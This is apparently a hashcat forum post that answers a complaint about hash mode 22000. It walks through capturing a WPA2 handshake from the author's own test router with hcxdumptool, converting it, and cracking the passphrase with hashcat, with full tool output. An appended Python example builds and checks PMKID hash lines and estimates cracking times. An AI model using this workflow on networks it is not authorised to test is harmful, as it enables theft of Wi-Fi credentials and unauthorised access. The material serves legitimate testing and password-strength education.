New 22000 mode is USELESS GARBAGE
Environment 1:

router: TP-Link TL-WR841N - encryption: WPA2 - wifi channel 11 (fixed)
We use the example password "hashcat!" from
https://hashcat.net/wiki/doku.php?id=example_hashes
client: notebook

get target information:
Code:
$ sudo hcxdumptool -i wlp39s0f3u1u1u2 --do_rcascan -c 11
BSSID        FREQ  CH RSSI BEACON RESPONSE ESSID  SCAN-FREQ: 2462 INJECTION-RATIO: 100% [13:11:05]
-----------------------------------------------------------------------------------------------------
6466b38ec3fc 2462  11  -31    24      23 TP-LINK_HASHCAT_TEST

set monitor mode and create attack filter tailored to the target:
Code:
$ sudo hcxdumptool -m wlp39s0f3u1u1u2
$ sudo tcpdump -i wlp39s0f3u1u1u2 wlan addr1 6466b38ec3fc or wlan addr2 6466b38ec3fc or wlan addr3 6466b38ec3fc -ddd > target.bpfc
This is not mandatory, but we do not want to disturb/jam the entire neighborhood.

run attack:
Code:
$ sudo hcxdumptool -i wlp39s0f3u1u1u2 -c 11 -o test.pcapng --enable_status=15 --bpfc=target.bpfc --active_beacon
initialization of hcxdumptool 6.2.6-10-g36ce1fb (depending on the capabilities of the device, this may take some time)...
interface is already in monitor mode, skipping ioctl(SIOCSIWMODE) and ioctl(SIOCSIFFLAGS) system calls

start capturing (stop with ctrl+c)
NMEA 0183 SENTENCE........: N/A
PHYSICAL INTERFACE........: phy0
INTERFACE NAME............: wlp39s0f3u1u1u2
INTERFACE PROTOCOL........: IEEE 802.11
INTERFACE TX POWER........: 20 dBm (lowest value reported by the device)
INTERFACE HARDWARE MAC....: 74da38f2038e (not used for the attack)
INTERFACE VIRTUAL MAC.....: 74da38f2038e (not used for the attack)
DRIVER....................: mt7601u
DRIVER VERSION............: 5.18.0-arch1-1
DRIVER FIRMWARE VERSION...: N/A
openSSL version...........: 1.1
ERRORMAX..................: 100 errors
BPF code blocks...........: 33
FILTERLIST ACCESS POINT...: 0 entries
FILTERLIST CLIENT.........: 0 entries
FILTERMODE................: unused
WEAK CANDIDATE............: 12345678
ESSID list................: 0 entries
ACCESS POINT (ROGUE)......: 000e175c955e (BROADCAST WILDCARD used for the attack)
ACCESS POINT (ROGUE)......: 000e175c955f (BROADCAST OPEN used for the attack)
ACCESS POINT (ROGUE)......: 000e175c9560 (used for the attack and incremented on every new client)
CLIENT (ROGUE)............: b0ece1ad5e88
EAPOLTIMEOUT..............: 20000 usec
EAPOLEAPTIMEOUT...........: 2500000 usec
REPLAYCOUNT...............: 63271
ANONCE....................: 2c1480188261ae8ecb947768c0838ebf2bc650f41e443656a64a0af314f36e5d
SNONCE....................: 358c7cc83ff0600a54c79e5660a9763a54abde52564c5203eb9db3caf722341a

TIME    FREQ/CH  MAC_DEST    MAC_SOURCE  ESSID [FRAME TYPE]
13:24:05 2462/11  ffffffffffff 6466b38ec3fc TP-LINK_HASHCAT_TEST [BEACON]
13:24:06 2462/11  225edc49b7aa 6466b38ec3fc TP-LINK_HASHCAT_TEST [AUTHENTICATION]
13:24:06 2462/11  225edc49b7aa 6466b38ec3fc TP-LINK_HASHCAT_TEST [ASSOCIATION]
13:24:06 2462/11  225edc49b7aa 6466b38ec3fc TP-LINK_HASHCAT_TEST [EAPOL:M2M3 EAPOLTIME:4227 RC:2 KDV:2]
13:24:06 2462/11  225edc49b7aa 6466b38ec3fc TP-LINK_HASHCAT_TEST [EAPOL:M3M4ZEROED EAPOLTIME:9937 RC:2 KDV:2]
^C
terminating...


convert to hash file hc22000:
Code:
$ hcxpcapngtool -o test.hc22000 test.pcapng
hcxpcapngtool 6.2.7-5-gd66ebbf reading from test.pcapng...

summary capture file
--------------------
file name.................................: test.pcapng
version (pcapng).........................: 1.0
operating system.........................: Linux 5.18.0-arch1-1
application..............................: hcxdumptool 6.2.6-10-g36ce1fb
interface name...........................: wlp39s0f3u1u1u2
interface vendor.........................: 74da38
openSSL version..........................: 1.1
weak candidate...........................: 12345678
MAC ACCESS POINT.........................: 000e175c9560 (incremented on every new client)
MAC CLIENT...............................: b0ece1ad5e88
REPLAYCOUNT..............................: 63271
ANONCE...................................: 2c1480188261ae8ecb947768c0838ebf2bc650f41e443656a64a0af314f36e5d
SNONCE...................................: 358c7cc83ff0600a54c79e5660a9763a54abde52564c5203eb9db3caf722341a
timestamp minimum (GMT)..................: 30.05.2022 13:24:05
timestamp maximum (GMT)..................: 30.05.2022 13:24:07
used capture interfaces..................: 1
link layer header type...................: DLT_IEEE802_11_RADIO (127)
endianess (capture system)...............: little endian
packets inside...........................: 114
packets received on 2.4 GHz..............: 112
ESSID (total unique).....................: 1
BEACON (total)...........................: 1
BEACON on 2.4 GHz channel (from IE_TAG)..: 11
AUTHENTICATION (total)...................: 2
AUTHENTICATION (OPEN SYSTEM).............: 2
ASSOCIATIONREQUEST (total)...............: 1
ASSOCIATIONREQUEST (PSK).................: 1
EAPOL messages (total)...................: 109
EAPOL RSN messages.......................: 109
EAPOLTIME gap (measured maximum usec)....: 43208
EAPOL ANONCE error corrections (NC)......: working
REPLAYCOUNT gap (recommended NC).........: 8
EAPOL M1 messages (total)................: 106
EAPOL M2 messages (total)................: 1
EAPOL M3 messages (total)................: 1
EAPOL M4 messages (total)................: 1
EAPOL pairs (total)......................: 2
EAPOL pairs (best).......................: 1
EAPOL pairs written to 22000 hash file....: 1 (RC checked)
EAPOL M32E2 (authorized).................: 1

frequency statistics from radiotap header (frequency: received packets)
-----------------------------------------------------------------------
2462: 112

Information: missing frames!
This dump file does not contain undirected proberequest frames.
An undirected proberequest may contain information about the PSK.
It always happens if the capture file was cleaned or
it could happen if filter options are used during capturing.
That makes it hard to recover the PSK.

session summary
---------------
processed pcapng files................: 1

Please notice that I excluded undirected PROBEREQUEST frames when creating the packet filter. We don't need them for this small test.
hcxpcapngtool noticed that and gave a warning.
If you want to include them, you have to modify the filter this way:
Code:
$ sudo tcpdump -i wlp39s0f3u1u1u2 wlan addr1 ffffffffffff or wlan addr1 6466b38ec3fc or wlan addr2 6466b38ec3fc or wlan addr3 6466b38ec3fc -ddd > target.bpfc


run hashcat to recover the PSK:
Code:
$ hashcat -m 22000 test.hc22000 -a 3 hashcat!
hashcat (v6.2.5-439-ged3b52185) starting

nvmlDeviceGetFanSpeed(): Not Supported

CUDA API (CUDA 11.7)
====================
* Device #1: NVIDIA GeForce GTX 1650, 3852/3911 MB, 16MCU

OpenCL API (OpenCL 3.0 CUDA 11.7.57) - Platform #1 [NVIDIA Corporation]
=======================================================================
* Device #2: NVIDIA GeForce GTX 1650, skipped


Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1084 MB

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.         

024022795224bffca545276c3762686f:6466b38ec3fc:225edc49b7aa:TP-LINK_HASHCAT_TEST:hashcat!

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: test.hc22000
Time.Started.....: Mon May 30 13:27:52 2022 (0 secs)
Time.Estimated...: Mon May 30 13:27:52 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: hashcat! [8]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      29 H/s (0.20ms) @ Accel:32 Loops:64 Thr:256 Vec:1
Recovered.Total..: 1/1 (100.00%) Digests
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: hashcat! -> hashcat!
Hardware.Mon.#1..: Temp: 47c Util: 26% Core:1770MHz Mem:3500MHz Bus:8

Started: Mon May 30 13:27:49 2022
Stopped: Mon May 30 13:27:54 2022

The complete process (preparing environment -> recovered PSK) took no more than 5 minutes.

From my point of view, the new hash mode 22000 is fantastic. Running hashcat (mode 22000) in combination with hcxdumptool/hcxlabtool and hcxtools even my GTX 1650 is fast enough to recover a PSK in a short time.


Environment 2:
To verify that hcxpcapngtool -> hashcat is working as expected, you can use this example dump file (in pcap format) from:
https://wiki.wireshark.org/SampleCaptures
Code:
$ wget https://wiki.wireshark.org/uploads/__moin_import__/attachments/SampleCaptures/wpa-Induction.pcap

convert to hash file hc22000:
Code:
$ hcxpcapngtool -o wpa-induction.hc22000 wpa-Induction.pcap
hcxpcapngtool 6.2.7-5-gd66ebbf reading from wpa-Induction.pcap...

summary capture file
--------------------
file name.................................: wpa-Induction.pcap
version (pcap/cap).......................: 2.4 (very basic format without any additional information)
timestamp minimum (GMT)..................: 04.01.2007 07:14:45
timestamp maximum (GMT)..................: 04.01.2007 07:15:26
used capture interfaces..................: 1
link layer header type...................: DLT_IEEE802_11_RADIO (127)
endianess (capture system)...............: little endian
packets inside...........................: 1093
frames with correct FCS..................: 1080
WIRELESS DISTRIBUTION SYSTEM.............: 1
ESSID (total unique).....................: 2
BEACON (total)...........................: 398
BEACON on 2.4 GHz channel (from IE_TAG)..: 1
PROBEREQUEST.............................: 12
PROBEREQUEST (directed)..................: 1
PROBERESPONSE (total)....................: 26
DISASSOCIATION (total)...................: 1
AUTHENTICATION (total)...................: 2
AUTHENTICATION (OPEN SYSTEM).............: 2
ASSOCIATIONREQUEST (total)...............: 1
ASSOCIATIONREQUEST (PSK).................: 1
RESERVED MANAGEMENT frame................: 4
WPA encrypted............................: 280
EAPOL messages (total)...................: 4
EAPOL RSN messages.......................: 4
EAPOLTIME gap (measured maximum usec)....: 4998
EAPOL ANONCE error corrections (NC)......: working
REPLAYCOUNT gap (recommended NC).........: 8
EAPOL M1 messages (total)................: 1
EAPOL M2 messages (total)................: 1
EAPOL M3 messages (total)................: 1
EAPOL M4 messages (total)................: 1
EAPOL pairs (total)......................: 2
EAPOL pairs (best).......................: 1
EAPOL pairs written to 22000 hash file....: 1 (RC checked)
EAPOL M32E2 (authorized).................: 1
PMKID (total)............................: 1
PMKID (from zeroed PMK)..................: 1

frequency statistics from radiotap header (frequency: received packets)
-----------------------------------------------------------------------
not available due to missing radiotap header

Information: limited dump file format detected!
This file format is a very basic format to save captured network data.
It is recommended to use PCAP Next Generation dump file format (or pcapng for short) instead.
The PCAP Next Generation dump file format is an attempt to overcome the limitations
of the currently widely used (but limited) libpcap (cap, pcap) format.
https://www.wireshark.org/docs/wsug_html_chunked/AppFiles.html#ChAppFilesCaptureFilesSection
https://github.com/pcapng/pcapng

Information: missing frames!
This dump file does not contain enough EAPOL M1 frames.
It always happens if the capture file was cleaned or
it could happen if filter options are used during capturing.
That makes it impossible to calculate nonce-error-correction values.

session summary
---------------
processed cap files...................: 1


get a good (and small) wordlist:
Code:
$ wget https://wpa-sec.stanev.org/dict/cracked.txt.gz


run hashcat to recover the example PSK:
Code:
$ hashcat -m 22000 wpa-induction.hc22000 cracked.txt.gz
hashcat (v6.2.5-439-ged3b52185) starting

nvmlDeviceGetFanSpeed(): Not Supported

CUDA API (CUDA 11.7)
====================
* Device #1: NVIDIA GeForce GTX 1650, 3852/3911 MB, 16MCU

OpenCL API (OpenCL 3.0 CUDA 11.7.57) - Platform #1 [NVIDIA Corporation]
=======================================================================
* Device #2: NVIDIA GeForce GTX 1650, skipped

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Hashes: 1 digests; 1 unique digests, 1 unique salts

Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1084 MB

Dictionary cache built:
* Filename..: cracked.txt.gz
* Passwords.: 358090
* Bytes.....: 3881090
* Keyspace..: 358090
* Runtime...: 0 secs

a462a7029ad5ba30b6af0df391988e45:000c4182b255:000d9382363a:Coherer:Induction

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: wpa-induction.hc22000
Time.Started.....: Mon May 30 14:26:50 2022 (2 secs)
Time.Estimated...: Mon May 30 14:26:52 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (cracked.txt.gz)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    85823 H/s (11.14ms) @ Accel:64 Loops:256 Thr:32 Vec:1
Recovered.Total..: 1/1 (100.00%) Digests
Progress.........: 131072/358090 (36.60%)
Rejected.........: 0/131072 (0.00%)
Restore.Point....: 98304/358090 (27.45%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: E5EB6C05AE -> DMCJUWPR
Hardware.Mon.#1..: Temp: 41c Util: 39% Core:1545MHz Mem:3500MHz Bus:8

Started: Mon May 30 14:26:48 2022
Stopped: Mon May 30 14:26:52 2022
And again, my GTX 1650 is fast enough to recover the PSK in less than a minute.


BTW:
It would be good style if you described your steps exactly (description of environment, including your distribution, hashcat version, hcxdumptool version, hcxpcapngtool version, used command lines and expected results).


And the password for these two hashes
https://hashcat.net/forum/thread-10805-p...l#pid55450
is not(!) in rockyou.txt, so you should remove them.
Unfortunately you have not provided information about the environment and how you captured/converted them.


If you would like to reproduce the workflow from environment 1:
Download and convert the attached example dump file.
Get the word list as described in environment 2.
Run hashcat to recover the PSK.

Feel free to comment how long it took to recover the PSK so we can see if hash mode 22000 is really "useless garbage".

I'll open:
GTX 1650
$ hashcat -m 22000 test.22000 cracked.txt.gz
Recovered.Total..: 1/1 (100.00%) Digests
Started: Mon May 30 18:02:18 2022
Stopped: Mon May 30 18:02:21 2022


Attached Files
.zip   test.pcapng.zip (Size: 2.15 KB / Downloads: 5)
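The workflow above ends with hcxpcapngtool writing hc22000 lines and hashcat testing candidates against them. The following is an added example (editor's code, not from ZerBea's post and not hcxtools or hashcat source) that shows what such a line holds and why the mode is a "slow hash": it derives a PMKID the way IEEE 802.11 specifies it (PBKDF2-HMAC-SHA1 with 4096 iterations, then HMAC-SHA1-128 over "PMK Name" and the two MACs), writes it out in the 22000 PMKID line format, parses it back, checks a single candidate, and converts the speeds quoted in the post into time-to-exhaust figures. The ESSID, MACs and passphrases are constructed for the example, and all function names are the editor's; only the derivation and the line layout are the real ones.

```python
"""Added example (editor's code, not ZerBea's post or hcxtools/hashcat source).

Builds a hashcat 22000 PMKID line from constructed values, parses it back,
verifies one candidate passphrase against it, and turns the speeds quoted
in the post into time-to-exhaust figures. ESSID, MACs and passphrases are
constructed for this example; the derivations are the IEEE 802.11 ones.
"""
import hashlib
import hmac

PBKDF2_ITERATIONS = 4096  # fixed by 802.11 for WPA-PSK: the reason 22000 is a slow hash


def wpa_pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(),
                               PBKDF2_ITERATIONS, dklen=32)


def wpa_pmkid(pmk: bytes, mac_ap: bytes, mac_client: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_CLIENT)."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_client, hashlib.sha1).digest()[:16]


def build_pmkid_line(pmkid: bytes, mac_ap: bytes, mac_client: bytes, essid: str) -> str:
    """hc22000 type 01 line: WPA*01*PMKID*MAC_AP*MAC_CLIENT*ESSID_HEX***
    (ANONCE, EAPOL and MESSAGEPAIR stay empty for PMKID entries)."""
    return "WPA*01*%s*%s*%s*%s***" % (pmkid.hex(), mac_ap.hex(), mac_client.hex(),
                                      essid.encode().hex())


def parse_hc22000(line: str) -> dict:
    """Split a hc22000 line into its nine '*'-separated fields."""
    f = line.strip().split("*")
    if len(f) != 9 or f[0] != "WPA" or f[1] not in ("01", "02"):
        raise ValueError("not a hc22000 line: %r" % line)
    return {
        "type": f[1],                      # 01 = PMKID, 02 = EAPOL MIC
        "digest": bytes.fromhex(f[2]),     # PMKID or MIC, 16 bytes
        "mac_ap": bytes.fromhex(f[3]),
        "mac_client": bytes.fromhex(f[4]),
        "essid": bytes.fromhex(f[5]).decode("utf-8", "replace"),
        "anonce": bytes.fromhex(f[6]),     # empty for type 01
        "eapol": bytes.fromhex(f[7]),      # empty for type 01
        "messagepair": f[8],               # empty for type 01
    }


def verify_pmkid_candidate(entry: dict, passphrase: str) -> bool:
    """True if the passphrase reproduces the PMKID. Applies the 8..63 byte
    WPA-PSK length rule first (hashcat reports such candidates as Rejected)."""
    if entry["type"] != "01":
        raise ValueError("only PMKID (type 01) entries are handled here")
    if not 8 <= len(passphrase.encode()) <= 63:
        return False
    pmk = wpa_pmk(passphrase, entry["essid"])
    expected = wpa_pmkid(pmk, entry["mac_ap"], entry["mac_client"])
    return hmac.compare_digest(expected, entry["digest"])


def seconds_to_exhaust(keyspace: int, rate_hs: float) -> float:
    """Worst-case time to try a whole keyspace at a given hashes-per-second rate."""
    return keyspace / rate_hs


# Constructed sample: locally administered MACs, made-up ESSID and passphrase.
SAMPLE_ESSID = "constructed-essid"
SAMPLE_MAC_AP = bytes.fromhex("020000000001")
SAMPLE_MAC_CLIENT = bytes.fromhex("020000000002")
SAMPLE_PSK = "constructed-psk-1"


def demo_line() -> str:
    """The hc22000 line a converter would emit for the constructed sample."""
    pmkid = wpa_pmkid(wpa_pmk(SAMPLE_PSK, SAMPLE_ESSID), SAMPLE_MAC_AP, SAMPLE_MAC_CLIENT)
    return build_pmkid_line(pmkid, SAMPLE_MAC_AP, SAMPLE_MAC_CLIENT, SAMPLE_ESSID)


if __name__ == "__main__":
    line = demo_line()
    entry = parse_hc22000(line)
    print(line)
    print("right candidate:", verify_pmkid_candidate(entry, SAMPLE_PSK))
    print("wrong candidate:", verify_pmkid_candidate(entry, "constructed-psk-2"))
    # Speeds quoted in the post: 85823 H/s on a GTX 1650 against a 358090-word list,
    # versus a full 8-character [a-z0-9] keyspace at the same rate.
    print("wordlist (358090 words): %.1f s" % seconds_to_exhaust(358090, 85823))
    print("36^8 keyspace: %.0f days" % (seconds_to_exhaust(36 ** 8, 85823) / 86400))
```

The line carries the ESSID and both MACs in the clear, so a hash file already identifies the network it came from; only the PMKID field depends on the passphrase. The two time figures make the thread's point from the defender's side: a PSK that sits in a leaked-password list falls in seconds at the quoted rate, while the same rate needs about a year for a full 8-character alphanumeric space, and every extra random character multiplies that by 36.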